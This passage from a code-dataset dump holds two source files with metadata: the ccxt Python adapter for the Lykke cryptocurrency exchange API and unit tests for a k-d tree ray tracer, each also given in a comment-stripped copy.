session_protected = _signals.signal('session-protected')
| true
| true
|
f7051d918dd37949e61a5f9a742e216e26e774b9
| 12,368
|
py
|
Python
|
python/ccxt/lykke.py
|
mikepsinn/ccxt
|
04c73735f53a7f28f5f4bd7f6846503047297138
|
[
"MIT"
] | 1
|
2019-03-12T09:30:24.000Z
|
2019-03-12T09:30:24.000Z
|
python/ccxt/lykke.py
|
mikepsinn/ccxt
|
04c73735f53a7f28f5f4bd7f6846503047297138
|
[
"MIT"
] | null | null | null |
python/ccxt/lykke.py
|
mikepsinn/ccxt
|
04c73735f53a7f28f5f4bd7f6846503047297138
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.base.exchange import Exchange
import math
class lykke (Exchange):
def describe(self):
return self.deep_extend(super(lykke, self).describe(), {
'id': 'lykke',
'name': 'Lykke',
'countries': 'CH',
'version': 'v1',
'rateLimit': 200,
'has': {
'CORS': False,
'fetchOHLCV': False,
'fetchTrades': False,
'fetchOpenOrders': True,
'fetchClosedOrders': True,
'fetchOrders': True,
},
'requiredCredentials': {
'apiKey': True,
'secret': False,
},
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/34487620-3139a7b0-efe6-11e7-90f5-e520cef74451.jpg',
'api': {
'mobile': 'https://api.lykkex.com/api',
'public': 'https://hft-api.lykke.com/api',
'private': 'https://hft-api.lykke.com/api',
'test': {
'mobile': 'https://api.lykkex.com/api',
'public': 'https://hft-service-dev.lykkex.net/api',
'private': 'https://hft-service-dev.lykkex.net/api',
},
},
'www': 'https://www.lykke.com',
'doc': [
'https://hft-api.lykke.com/swagger/ui/',
'https://www.lykke.com/lykke_api',
],
'fees': 'https://www.lykke.com/trading-conditions',
},
'api': {
'mobile': {
'get': [
'AllAssetPairRates/{market}',
],
},
'public': {
'get': [
'AssetPairs',
'AssetPairs/{id}',
'IsAlive',
'OrderBooks',
'OrderBooks/{AssetPairId}',
],
},
'private': {
'get': [
'Orders',
'Orders/{id}',
'Wallets',
],
'post': [
'Orders/limit',
'Orders/market',
'Orders/{id}/Cancel',
],
},
},
'fees': {
'trading': {
'tierBased': False,
'percentage': True,
'maker': 0.0, # as of 7 Feb 2018, see https://github.com/ccxt/ccxt/issues/1863
'taker': 0.0, # https://www.lykke.com/cp/wallet-fees-and-limits
},
'funding': {
'tierBased': False,
'percentage': False,
'withdraw': {
'BTC': 0.001,
},
'deposit': {
'BTC': 0,
},
},
},
})
def fetch_balance(self, params={}):
self.load_markets()
balances = self.privateGetWallets()
result = {'info': balances}
for i in range(0, len(balances)):
balance = balances[i]
currency = balance['AssetId']
total = balance['Balance']
used = balance['Reserved']
free = total - used
result[currency] = {
'free': free,
'used': used,
'total': total,
}
return self.parse_balance(result)
def cancel_order(self, id, symbol=None, params={}):
return self.privatePostOrdersIdCancel({'id': id})
def create_order(self, symbol, type, side, amount, price=None, params={}):
self.load_markets()
market = self.market(symbol)
query = {
'AssetPairId': market['id'],
'OrderAction': self.capitalize(side),
'Volume': amount,
}
if type == 'market':
query['Asset'] = market['base'] if (side == 'buy') else market['quote']
elif type == 'limit':
query['Price'] = price
method = 'privatePostOrders' + self.capitalize(type)
result = getattr(self, method)(self.extend(query, params))
return {
'id': None,
'info': result,
}
def fetch_markets(self):
markets = self.publicGetAssetPairs()
result = []
for i in range(0, len(markets)):
market = markets[i]
id = market['Id']
base = market['BaseAssetId']
quote = market['QuotingAssetId']
base = self.common_currency_code(base)
quote = self.common_currency_code(quote)
symbol = market['Name']
precision = {
'amount': market['Accuracy'],
'price': market['InvertedAccuracy'],
}
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'active': True,
'info': market,
'lot': math.pow(10, -precision['amount']),
'precision': precision,
'limits': {
'amount': {
'min': math.pow(10, -precision['amount']),
'max': math.pow(10, precision['amount']),
},
'price': {
'min': math.pow(10, -precision['price']),
'max': math.pow(10, precision['price']),
},
},
})
return result
def parse_ticker(self, ticker, market=None):
timestamp = self.milliseconds()
symbol = None
if market:
symbol = market['symbol']
ticker = ticker['Result']
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': None,
'low': None,
'bid': float(ticker['Rate']['Bid']),
'ask': float(ticker['Rate']['Ask']),
'vwap': None,
'open': None,
'close': None,
'first': None,
'last': None,
'change': None,
'percentage': None,
'average': None,
'baseVolume': None,
'quoteVolume': None,
'info': ticker,
}
def fetch_ticker(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
ticker = self.mobileGetAllAssetPairRatesMarket(self.extend({
'market': market['id'],
}, params))
return self.parse_ticker(ticker, market)
def parse_order_status(self, status):
if status == 'Pending':
return 'open'
elif status == 'InOrderBook':
return 'open'
elif status == 'Processing':
return 'open'
elif status == 'Matched':
return 'closed'
elif status == 'Cancelled':
return 'canceled'
elif status == 'NotEnoughFunds':
return 'NotEnoughFunds'
elif status == 'NoLiquidity':
return 'NoLiquidity'
elif status == 'UnknownAsset':
return 'UnknownAsset'
elif status == 'LeadToNegativeSpread':
return 'LeadToNegativeSpread'
return status
def parse_order(self, order, market=None):
status = self.parse_order_status(order['Status'])
symbol = None
if not market:
if 'AssetPairId' in order:
if order['AssetPairId'] in self.markets_by_id:
market = self.markets_by_id[order['AssetPairId']]
if market:
symbol = market['symbol']
timestamp = None
if 'LastMatchTime' in order:
timestamp = self.parse8601(order['LastMatchTime'])
elif 'Registered' in order:
timestamp = self.parse8601(order['Registered'])
elif 'CreatedAt' in order:
timestamp = self.parse8601(order['CreatedAt'])
price = self.safe_float(order, 'Price')
amount = self.safe_float(order, 'Volume')
remaining = self.safe_float(order, 'RemainingVolume')
filled = amount - remaining
cost = filled * price
result = {
'info': order,
'id': order['Id'],
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'type': None,
'side': None,
'price': price,
'cost': cost,
'average': None,
'amount': amount,
'filled': filled,
'remaining': remaining,
'status': status,
'fee': None,
}
return result
def fetch_order(self, id, symbol=None, params={}):
response = self.privateGetOrdersId(self.extend({
'id': id,
}, params))
return self.parse_order(response)
def fetch_orders(self, symbol=None, since=None, limit=None, params={}):
response = self.privateGetOrders()
return self.parse_orders(response, None, since, limit)
def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
response = self.privateGetOrders(self.extend({
'status': 'InOrderBook',
}, params))
return self.parse_orders(response, None, since, limit)
def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}):
response = self.privateGetOrders(self.extend({
'status': 'Matched',
}, params))
return self.parse_orders(response, None, since, limit)
def fetch_order_book(self, symbol, limit=None, params={}):
self.load_markets()
response = self.publicGetOrderBooksAssetPairId(self.extend({
'AssetPairId': self.market_id(symbol),
}, params))
orderbook = {
'timestamp': None,
'bids': [],
'asks': [],
}
timestamp = None
for i in range(0, len(response)):
side = response[i]
if side['IsBuy']:
orderbook['bids'] = self.array_concat(orderbook['bids'], side['Prices'])
else:
orderbook['asks'] = self.array_concat(orderbook['asks'], side['Prices'])
timestamp = self.parse8601(side['Timestamp'])
if not orderbook['timestamp']:
orderbook['timestamp'] = timestamp
else:
orderbook['timestamp'] = max(orderbook['timestamp'], timestamp)
if not timestamp:
timestamp = self.milliseconds()
return self.parse_order_book(orderbook, orderbook['timestamp'], 'bids', 'asks', 'Price', 'Volume')
def parse_bid_ask(self, bidask, priceKey=0, amountKey=1):
price = float(bidask[priceKey])
amount = float(bidask[amountKey])
if amount < 0:
amount = -amount
return [price, amount]
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
url = self.urls['api'][api] + '/' + self.implode_params(path, params)
query = self.omit(params, self.extract_params(path))
if api == 'public':
if query:
url += '?' + self.urlencode(query)
elif api == 'private':
if method == 'GET':
if query:
url += '?' + self.urlencode(query)
self.check_required_credentials()
headers = {
'api-key': self.apiKey,
'Accept': 'application/json',
'Content-Type': 'application/json',
}
if method == 'POST':
if params:
body = self.json(params)
return {'url': url, 'method': method, 'body': body, 'headers': headers}
| 35.849275
| 126
| 0.467416
|
ge import Exchange
import math
class lykke (Exchange):
def describe(self):
return self.deep_extend(super(lykke, self).describe(), {
'id': 'lykke',
'name': 'Lykke',
'countries': 'CH',
'version': 'v1',
'rateLimit': 200,
'has': {
'CORS': False,
'fetchOHLCV': False,
'fetchTrades': False,
'fetchOpenOrders': True,
'fetchClosedOrders': True,
'fetchOrders': True,
},
'requiredCredentials': {
'apiKey': True,
'secret': False,
},
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/34487620-3139a7b0-efe6-11e7-90f5-e520cef74451.jpg',
'api': {
'mobile': 'https://api.lykkex.com/api',
'public': 'https://hft-api.lykke.com/api',
'private': 'https://hft-api.lykke.com/api',
'test': {
'mobile': 'https://api.lykkex.com/api',
'public': 'https://hft-service-dev.lykkex.net/api',
'private': 'https://hft-service-dev.lykkex.net/api',
},
},
'www': 'https://www.lykke.com',
'doc': [
'https://hft-api.lykke.com/swagger/ui/',
'https://www.lykke.com/lykke_api',
],
'fees': 'https://www.lykke.com/trading-conditions',
},
'api': {
'mobile': {
'get': [
'AllAssetPairRates/{market}',
],
},
'public': {
'get': [
'AssetPairs',
'AssetPairs/{id}',
'IsAlive',
'OrderBooks',
'OrderBooks/{AssetPairId}',
],
},
'private': {
'get': [
'Orders',
'Orders/{id}',
'Wallets',
],
'post': [
'Orders/limit',
'Orders/market',
'Orders/{id}/Cancel',
],
},
},
'fees': {
'trading': {
'tierBased': False,
'percentage': True,
'maker': 0.0,
'taker': 0.0,
},
'funding': {
'tierBased': False,
'percentage': False,
'withdraw': {
'BTC': 0.001,
},
'deposit': {
'BTC': 0,
},
},
},
})
def fetch_balance(self, params={}):
self.load_markets()
balances = self.privateGetWallets()
result = {'info': balances}
for i in range(0, len(balances)):
balance = balances[i]
currency = balance['AssetId']
total = balance['Balance']
used = balance['Reserved']
free = total - used
result[currency] = {
'free': free,
'used': used,
'total': total,
}
return self.parse_balance(result)
def cancel_order(self, id, symbol=None, params={}):
return self.privatePostOrdersIdCancel({'id': id})
def create_order(self, symbol, type, side, amount, price=None, params={}):
self.load_markets()
market = self.market(symbol)
query = {
'AssetPairId': market['id'],
'OrderAction': self.capitalize(side),
'Volume': amount,
}
if type == 'market':
query['Asset'] = market['base'] if (side == 'buy') else market['quote']
elif type == 'limit':
query['Price'] = price
method = 'privatePostOrders' + self.capitalize(type)
result = getattr(self, method)(self.extend(query, params))
return {
'id': None,
'info': result,
}
def fetch_markets(self):
markets = self.publicGetAssetPairs()
result = []
for i in range(0, len(markets)):
market = markets[i]
id = market['Id']
base = market['BaseAssetId']
quote = market['QuotingAssetId']
base = self.common_currency_code(base)
quote = self.common_currency_code(quote)
symbol = market['Name']
precision = {
'amount': market['Accuracy'],
'price': market['InvertedAccuracy'],
}
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'active': True,
'info': market,
'lot': math.pow(10, -precision['amount']),
'precision': precision,
'limits': {
'amount': {
'min': math.pow(10, -precision['amount']),
'max': math.pow(10, precision['amount']),
},
'price': {
'min': math.pow(10, -precision['price']),
'max': math.pow(10, precision['price']),
},
},
})
return result
def parse_ticker(self, ticker, market=None):
timestamp = self.milliseconds()
symbol = None
if market:
symbol = market['symbol']
ticker = ticker['Result']
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': None,
'low': None,
'bid': float(ticker['Rate']['Bid']),
'ask': float(ticker['Rate']['Ask']),
'vwap': None,
'open': None,
'close': None,
'first': None,
'last': None,
'change': None,
'percentage': None,
'average': None,
'baseVolume': None,
'quoteVolume': None,
'info': ticker,
}
def fetch_ticker(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
ticker = self.mobileGetAllAssetPairRatesMarket(self.extend({
'market': market['id'],
}, params))
return self.parse_ticker(ticker, market)
def parse_order_status(self, status):
if status == 'Pending':
return 'open'
elif status == 'InOrderBook':
return 'open'
elif status == 'Processing':
return 'open'
elif status == 'Matched':
return 'closed'
elif status == 'Cancelled':
return 'canceled'
elif status == 'NotEnoughFunds':
return 'NotEnoughFunds'
elif status == 'NoLiquidity':
return 'NoLiquidity'
elif status == 'UnknownAsset':
return 'UnknownAsset'
elif status == 'LeadToNegativeSpread':
return 'LeadToNegativeSpread'
return status
def parse_order(self, order, market=None):
status = self.parse_order_status(order['Status'])
symbol = None
if not market:
if 'AssetPairId' in order:
if order['AssetPairId'] in self.markets_by_id:
market = self.markets_by_id[order['AssetPairId']]
if market:
symbol = market['symbol']
timestamp = None
if 'LastMatchTime' in order:
timestamp = self.parse8601(order['LastMatchTime'])
elif 'Registered' in order:
timestamp = self.parse8601(order['Registered'])
elif 'CreatedAt' in order:
timestamp = self.parse8601(order['CreatedAt'])
price = self.safe_float(order, 'Price')
amount = self.safe_float(order, 'Volume')
remaining = self.safe_float(order, 'RemainingVolume')
filled = amount - remaining
cost = filled * price
result = {
'info': order,
'id': order['Id'],
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'type': None,
'side': None,
'price': price,
'cost': cost,
'average': None,
'amount': amount,
'filled': filled,
'remaining': remaining,
'status': status,
'fee': None,
}
return result
def fetch_order(self, id, symbol=None, params={}):
response = self.privateGetOrdersId(self.extend({
'id': id,
}, params))
return self.parse_order(response)
def fetch_orders(self, symbol=None, since=None, limit=None, params={}):
response = self.privateGetOrders()
return self.parse_orders(response, None, since, limit)
def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
response = self.privateGetOrders(self.extend({
'status': 'InOrderBook',
}, params))
return self.parse_orders(response, None, since, limit)
def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}):
response = self.privateGetOrders(self.extend({
'status': 'Matched',
}, params))
return self.parse_orders(response, None, since, limit)
def fetch_order_book(self, symbol, limit=None, params={}):
self.load_markets()
response = self.publicGetOrderBooksAssetPairId(self.extend({
'AssetPairId': self.market_id(symbol),
}, params))
orderbook = {
'timestamp': None,
'bids': [],
'asks': [],
}
timestamp = None
for i in range(0, len(response)):
side = response[i]
if side['IsBuy']:
orderbook['bids'] = self.array_concat(orderbook['bids'], side['Prices'])
else:
orderbook['asks'] = self.array_concat(orderbook['asks'], side['Prices'])
timestamp = self.parse8601(side['Timestamp'])
if not orderbook['timestamp']:
orderbook['timestamp'] = timestamp
else:
orderbook['timestamp'] = max(orderbook['timestamp'], timestamp)
if not timestamp:
timestamp = self.milliseconds()
return self.parse_order_book(orderbook, orderbook['timestamp'], 'bids', 'asks', 'Price', 'Volume')
def parse_bid_ask(self, bidask, priceKey=0, amountKey=1):
price = float(bidask[priceKey])
amount = float(bidask[amountKey])
if amount < 0:
amount = -amount
return [price, amount]
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
url = self.urls['api'][api] + '/' + self.implode_params(path, params)
query = self.omit(params, self.extract_params(path))
if api == 'public':
if query:
url += '?' + self.urlencode(query)
elif api == 'private':
if method == 'GET':
if query:
url += '?' + self.urlencode(query)
self.check_required_credentials()
headers = {
'api-key': self.apiKey,
'Accept': 'application/json',
'Content-Type': 'application/json',
}
if method == 'POST':
if params:
body = self.json(params)
return {'url': url, 'method': method, 'body': body, 'headers': headers}
| true
| true
|
f7051dc01ebdfbe27bb258f790b4db971830c134
| 17,851
|
py
|
Python
|
unittests/ray_tracer/test_kdtree.py
|
nasa/giant
|
1e939272d9a0ca533b4da400d132f854520f3adc
|
[
"NASA-1.3"
] | 5
|
2021-09-10T14:29:19.000Z
|
2022-01-13T20:15:01.000Z
|
unittests/ray_tracer/test_kdtree.py
|
nasa/giant
|
1e939272d9a0ca533b4da400d132f854520f3adc
|
[
"NASA-1.3"
] | null | null | null |
unittests/ray_tracer/test_kdtree.py
|
nasa/giant
|
1e939272d9a0ca533b4da400d132f854520f3adc
|
[
"NASA-1.3"
] | 2
|
2021-10-01T18:39:13.000Z
|
2021-12-30T08:53:08.000Z
|
from unittest import TestCase, skip
import copy
import numpy as np
from giant import rotations as at
from giant.ray_tracer import kdtree, shapes, rays
class TestKDTree(TestCase):
def setUp(self):
self.max_depth = 4
tri1 = np.array([[-5, -4, -4.5],
[0, 0, 1],
[0, 0, 0]])
tri2 = tri1+np.array([[2.5, 0, 0]]).T
tri3 = tri2+np.array([[2.5, 0, 0]]).T
tri4 = tri3+np.array([[2.5, 0, 0]]).T
self.triangles = shapes.Triangle64(np.hstack([tri1, tri2, tri3, tri4]).T, 1,
np.arange(12).reshape(-1, 3))
self.shapes = self.triangles
self.stacked_tries = shapes.Triangle64(np.hstack([tri1, tri2,
tri1+[[0], [0], [2.5]],
tri2 + [[0], [0], [2.5]]]).T, 1,
np.arange(12).reshape(-1, 3))
def test_creation(self):
tree = kdtree.KDTree(self.shapes, max_depth=self.max_depth)
self.assertEqual(tree.max_depth, self.max_depth)
self.assertEqual(tree.surface, self.shapes)
def test_build(self):
tree = kdtree.KDTree(self.shapes, max_depth=self.max_depth)
tree.build(force=True, print_progress=False)
facets = np.arange(12).reshape(-1, 3)
tris = [shapes.Triangle64(self.triangles.vertices, self.triangles.albedos, face)
for face in facets]
for tri in tris:
tri.bounding_box = None
node20 = kdtree.KDNode(tris[0])
node21 = kdtree.KDNode(tris[1])
node22 = kdtree.KDNode(tris[2])
node23 = kdtree.KDNode(tris[3])
node10 = kdtree.KDNode()
node10.bounding_box = shapes.AxisAlignedBoundingBox([-5, 0, 0], [-1.5, 1, 0])
node10.left = node20
node10.right = node21
node11 = kdtree.KDNode()
node11.bounding_box = shapes.AxisAlignedBoundingBox([0., 0, 0], [3.5, 1, 0])
node11.left = node22
node11.right = node23
node00 = kdtree.KDNode()
node00.bounding_box = self.triangles.bounding_box
node00.left = node10
node00.right = node11
node00.order = 0
self.assertEqual(node00, tree.root)
def test_trace(self):
with self.subTest(stacked=False):
tree = kdtree.KDTree(self.shapes, max_depth=self.max_depth)
tree.build(force=True, print_progress=False)
starts = np.array([[-4.5, -2, 0.5, 3],
[0.5, 0.5, 0.5, 0.5],
[1, 1, 1, 1]])
directions = np.array([[0, 0, 0, 0],
[0, 0, 0, 0],
[-1, -1, -1, -1]], dtype=np.float64)
rays_test = rays.Rays(starts, directions)
ints = tree.trace(rays_test)
nodes = [tree.root.left.left, tree.root.left.right, tree.root.right.left, tree.root.right.right]
with self.subTest(rotation=None, translation=None):
for ind, int_check in enumerate(ints):
with self.subTest(ignore=False, ind=ind):
self.assertTrue(int_check["check"])
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 1])
np.testing.assert_array_equal(int_check["normal"], self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tree.root.order+1)))
ignore_ind = 2
rays_test.ignore = [nodes[ignore_ind].id*(10**(tree.root.order+1))]*rays_test.num_rays
ints = tree.trace(rays_test)
for ind, int_check in enumerate(ints):
with self.subTest(ignore=True, ind=ind):
if ind != ignore_ind:
# int_check = int_check[0]
self.assertTrue(int_check["check"])
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 1])
np.testing.assert_array_equal(int_check["normal"], self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tree.root.order+1)))
else:
self.assertFalse(int_check["check"])
self.assertTrue(np.isnan(int_check["intersect"]).all())
self.assertTrue(np.isnan(int_check["normal"]).all())
self.assertTrue(np.isnan(int_check["albedo"]))
self.assertEqual(int_check["facet"], -1)
rotation = at.Rotation([0, 0, -np.pi / 2])
rays_test.ignore = None
with self.subTest(rotation=rotation, translation=None):
tc = copy.deepcopy(tree)
tc.rotate(rotation)
ints = tc.trace(rays_test)
self.assertFalse(ints["check"].any())
starts2 = np.array([[0.5, 0.5, 0.5, 0.5],
[4.5, 2, -0.5, -3],
[1, 1, 1, 1]])
directions2 = np.array([[0, 0, 0, 0],
[0, 0, 0, 0],
[-1, -1, -1, -1]], dtype=np.float64)
rays_test2 = rays.Rays(starts2, directions2)
ints = tc.trace(rays_test2)
for ind, int_check in enumerate(ints):
# int_check = int_check[0]
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts2[:, ind]-[0, 0, 1])
np.testing.assert_array_equal(int_check["normal"], rotation.matrix@self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tc.root.order+1)))
translation = [0, 0, -0.5]
with self.subTest(rotation=None, translation=translation):
tc = copy.deepcopy(tree)
tc.translate(translation)
ints = tc.trace(rays_test)
for ind, int_check in enumerate(ints):
# int_check = int_check[0]
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts[:, ind]-[0, 0, 1.5])
np.testing.assert_array_almost_equal(int_check["normal"], self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tc.root.order+1)))
with self.subTest(rotation=rotation, translation=translation):
tc = copy.deepcopy(tree)
tc.rotate(rotation)
tc.translate(translation)
ints = tc.trace(rays_test)
self.assertFalse(ints["check"].any())
starts2 = np.array([[0.5, 0.5, 0.5, 0.5],
[4.5, 2, -0.5, -3],
[1, 1, 1, 1]])
directions2 = np.array([[0, 0, 0, 0],
[0, 0, 0, 0],
[-1, -1, -1, -1]], dtype=np.float64)
rays_test2 = rays.Rays(starts2, directions2)
ints = tc.trace(rays_test2)
for ind, int_check in enumerate(ints):
# int_check = int_check[0]
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts2[:, ind]-[0, 0, 1.5])
np.testing.assert_array_equal(int_check["normal"], rotation.matrix@self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tc.root.order+1)))
rotation = at.Rotation([np.pi / 2, 0, 0])
with self.subTest(rotation=rotation, translation=None):
tc = copy.deepcopy(tree)
tc.rotate(rotation)
ints = tc.trace(rays_test)
self.assertFalse(ints["check"].any())
starts2 = np.array([[-4.5, -2, 0.5, 3],
[1, 1, 1, 1],
[0.5, 0.5, 0.5, 0.5]])
directions2 = np.array([[0, 0, 0, 0],
[-1, -1, -1, -1],
[0, 0, 0, 0]], dtype=np.float64)
rays_test2 = rays.Rays(starts2, directions2)
ints = tc.trace(rays_test2)
for ind, int_check in enumerate(ints):
# int_check = int_check[0]
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts2[:, ind]-[0, 1, 0])
np.testing.assert_array_equal(int_check["normal"], rotation.matrix@self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tc.root.order+1)))
translation = [2.5, 0, 0]
with self.subTest(rotation=None, translation=translation):
tc = copy.deepcopy(tree)
tc.translate(translation)
ints = tc.trace(rays_test)
self.assertFalse(ints["check"][0])
for ind, int_check in enumerate(ints[1:]):
ind += 1
# int_check = int_check[0]
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts[:, ind]-[0, 0, 1])
np.testing.assert_array_almost_equal(int_check["normal"], self.triangles.normals[ind-1])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind-1].id*(10**(tc.root.order+1)))
translation = [0, -0.5, 0]
with self.subTest(rotation=rotation, translation=translation):
with self.subTest(order='rt'):
tc = copy.deepcopy(tree)
tc.rotate(rotation)
tc.translate(translation)
ints = tc.trace(rays_test)
self.assertFalse(ints["check"].any())
starts2 = np.array([[-4.5, -2, 0.5, 3],
[1, 1, 1, 1],
[0.5, 0.5, 0.5, 0.5]])
directions2 = np.array([[0, 0, 0, 0],
[-1, -1, -1, -1],
[0, 0, 0, 0]], dtype=np.float64)
rays_test2 = rays.Rays(starts2, directions2)
ints = tc.trace(rays_test2)
for ind, int_check in enumerate(ints):
# int_check = int_check[0]
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts2[:, ind]-[0, 1.5, 0])
np.testing.assert_array_equal(int_check["normal"], rotation.matrix@self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tc.root.order+1)))
with self.subTest(order='tr'):
tc = copy.deepcopy(tree)
tc.translate(translation)
tc.rotate(rotation)
ints = tc.trace(rays_test)
self.assertFalse(ints["check"].any())
starts2 = np.array([[-4.5, -2, 0.5, 3],
[1, 1, 1, 1],
[0, 0, 0, 0]])
directions2 = np.array([[0, 0, 0, 0],
[-1, -1, -1, -1],
[0, 0, 0, 0]], dtype=np.float64)
rays_test2 = rays.Rays(starts2, directions2)
ints = tc.trace(rays_test2)
for ind, int_check in enumerate(ints):
# int_check = int_check[0]
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts2[:, ind]-[0, 1, 0])
np.testing.assert_array_equal(int_check["normal"], rotation.matrix@self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tc.root.order+1)))
with self.subTest(stacked=True):
tree = kdtree.KDTree(self.stacked_tries, max_depth=self.max_depth)
tree.build(force=True, print_progress=False)
starts = np.array([[-4.5, -2, -4.5, -2],
[0.5, 0.5, 0.5, 0.5],
[1, 1, 5, 5]])
directions = np.array([[0, 0, 0, 0],
[0, 0, 0, 0],
[-1, -1, -1, -1]], dtype=np.float64)
rays_test = rays.Rays(starts, directions)
ints = tree.trace(rays_test)
nodes = [tree.root.left.left, tree.root.right.left, tree.root.left.right, tree.root.right.right]
for ind, int_check in enumerate(ints):
with self.subTest(ignore=False, ind=ind):
self.assertTrue(int_check["check"])
if ind < 2:
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 1])
else:
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 2.5])
np.testing.assert_array_equal(int_check["normal"], self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tree.root.order+1)))
ignore_ind = 2
rays_test.ignore = [nodes[ignore_ind].id*(10**(tree.root.order+1))]*rays_test.num_rays
ints = tree.trace(rays_test)
for ind, int_check in enumerate(ints):
with self.subTest(ignore=True, ind=ind):
if ind != ignore_ind:
# int_check = int_check[0]
self.assertTrue(int_check["check"])
if ind < 2:
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 1])
else:
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 2.5])
np.testing.assert_array_equal(int_check["normal"], self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tree.root.order+1)))
else:
self.assertTrue(int_check["check"])
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 5])
np.testing.assert_array_equal(int_check["normal"], self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[0].id*(10**(tree.root.order+1)))
class TestKDNode(TestCase):
def setUp(self):
tri1 = np.array([[-5, -4, -4.5],
[0, 0, 1],
[0, 0, 0]])
tri2 = tri1+np.array([[2.5, 0, 0]]).T
tri3 = tri2+np.array([[2.5, 0, 0]]).T
tri4 = tri3+np.array([[2.5, 0, 0]]).T
self.triangles = shapes.Triangle64(np.hstack([tri1, tri2, tri3, tri4]).T, 1, np.arange(12).reshape(-1, 3))
def test_creation(self):
node = kdtree.KDNode(surface=self.triangles)
self.assertEqual(node.surface, self.triangles)
self.assertEqual(node.bounding_box, self.triangles.bounding_box)
self.assertIsNone(node.left)
self.assertIsNone(node.right)
def test_compute_bounding_box(self):
node = kdtree.KDNode()
node.surface = self.triangles
node.has_surface = True
node.compute_bounding_box()
self.assertEqual(node.bounding_box, self.triangles.bounding_box)
def test_split(self):
node = kdtree.KDNode(surface=self.triangles)
node.split(force=True, print_progress=False)
left_tris = kdtree.KDNode(shapes.Triangle64(self.triangles.vertices, 1, np.arange(6).reshape(3, -1), compute_bounding_box=False))
right_tris = kdtree.KDNode(shapes.Triangle64(self.triangles.vertices, 1, np.arange(6, 12).reshape(3, -1), compute_bounding_box=False))
self.assertEqual(node.left, left_tris)
self.assertEqual(node.right, right_tris)
def test_trace(self):
# TODO: figure out how to implement this
pass
| 35.702
| 142
| 0.493866
|
from unittest import TestCase, skip
import copy
import numpy as np
from giant import rotations as at
from giant.ray_tracer import kdtree, shapes, rays
class TestKDTree(TestCase):
def setUp(self):
self.max_depth = 4
tri1 = np.array([[-5, -4, -4.5],
[0, 0, 1],
[0, 0, 0]])
tri2 = tri1+np.array([[2.5, 0, 0]]).T
tri3 = tri2+np.array([[2.5, 0, 0]]).T
tri4 = tri3+np.array([[2.5, 0, 0]]).T
self.triangles = shapes.Triangle64(np.hstack([tri1, tri2, tri3, tri4]).T, 1,
np.arange(12).reshape(-1, 3))
self.shapes = self.triangles
self.stacked_tries = shapes.Triangle64(np.hstack([tri1, tri2,
tri1+[[0], [0], [2.5]],
tri2 + [[0], [0], [2.5]]]).T, 1,
np.arange(12).reshape(-1, 3))
def test_creation(self):
tree = kdtree.KDTree(self.shapes, max_depth=self.max_depth)
self.assertEqual(tree.max_depth, self.max_depth)
self.assertEqual(tree.surface, self.shapes)
def test_build(self):
tree = kdtree.KDTree(self.shapes, max_depth=self.max_depth)
tree.build(force=True, print_progress=False)
